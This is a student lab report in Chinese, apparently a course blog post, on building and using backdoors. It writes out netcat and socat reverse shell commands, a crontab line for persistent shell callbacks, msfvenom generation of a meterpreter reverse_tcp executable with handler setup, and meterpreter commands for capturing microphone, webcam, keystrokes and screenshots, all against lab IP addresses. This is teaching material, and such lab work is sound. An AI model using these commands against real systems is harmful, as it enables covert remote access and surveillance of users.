20175235 《网络对抗技术》实验二 后门原理与实践
20175235泽仁拉措
目录:
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.基础知识总结
(1)后门:是不经过正常认证流程而访问系统流程的通道。
(2)常见后门有:编译器后门、操作系统后门、应用程序后门、潜伏或伪装成特定应用的专用后门程序。
(3)布置后门的流程:<1>有一个后门程序;<2>将其放置在系统里;<3>使后门程序代码运行起来;<3>不被查杀软件查杀且不被防火墙发现。(常用技术有:反弹式连接;加密技术;隧道技术)。
(4)常用后门工具:
<1>netcat:又名nc、ncat。是一个底层工具,进行基本的TCP.UDP数据收发,常与其他工具结合使用作为后门。
Linux:自带netcat,输入man nc查看其使用说明。
Windows: 下载ncat.rar工具包。
一、Win获得Linux Shell
先下载ncat到主机,将其解压到d:/ncat,在主机的cmd输入ipconfig查找主机ip
①首先在Windows中使用 ipconfig 查看主机IP地址
②在cmd进入ncat所在的文件夹,输入命令ncat.exe -l -p 8888并运行
③在linux终端中输入nc 192.168.153.1 8888 -e /bin/sh:
④此时Win已经获得Linux Shell,如图所示:
二、Linux获得Win Shell
①在linux终端中输入ip add查看ip
②输入nc -l -p 8888使其处于监听状态
在主机的cmd还是打开之前的ncat文件夹,输入ncat.exe -e cmd.exe192.168.153.128 8888
再看linux已经出现了win的命令提示:
实验内容
一、使用netcat获取主机操作Shell,cron启动
1.crontab -e
指令增加一条定时任务,-e
表示编辑。
2.在最后一行添加1 * * * * /bin/netcat 192.168.153.1 8888 -e /bin/sh
3.当时间到了,此时已经获得了Kali的shell,可以输入指令ls
二、使用socat获取主机操作Shell, 任务计划启动
1.在主机中找到控制面板-系统与安全-管理工具-任务计划程序,选择创建任务
2.选择新建触发器,设置相应触发的时间
3.在操作中选择每次需要执行的程序或脚本
4.看到任务的状态为准备就绪
5.此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口
6.在kali中输入指令socat - tcp:192.168.:8888
此时可以发现已经成功获得了一个shell,下图为输入dir的结果
三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在kali中生成后门程序meter_backdoor.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.132 LPORT=5311 -f exe > meter_backdoor.exe
2.将后门程序拷贝到Win10中,在kali中打开MSF监听程序msfconsole
依次输入use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,set LHOST 192.168.40.132,set LPORT 5311
等命令进行配置。
3.在win10中打开meter_backdoor.exe后门程序。
在kali中输入exploit
就能得到入侵成功的结果。
四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.使用record_mic
指令可以截获一段音频
2.使用webcam_snap
指令可以使用摄像头进行拍照
3.使用keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录
4.使用screenshot
指令可以进行截屏
五、基础问题回答及实验心得
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:下载了软件有恶意代码违背杀毒软件成功查杀,则该后门成功进入到我的系统中。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:1.开机自启动技术;
2.windows定时任务;
3.木马化正常软件。
(3)Meterpreter有哪些给你映像深刻的功能?
答:Meterpreter是一个后门平台
(4)如何发现自己有系统有没有被安装后门?
答:查看注册表、进程、端口情况,使用杀毒软件进行查杀。
3.2.实验总结与体会
答:我做到第三步,就怎么也不行,查了很多,都不行,以至于第四个实验也做不了,决定先把博客交了再找找有什么方法,把没做出来的补上。
来源:https://www.cnblogs.com/Zrlc/p/12541193.html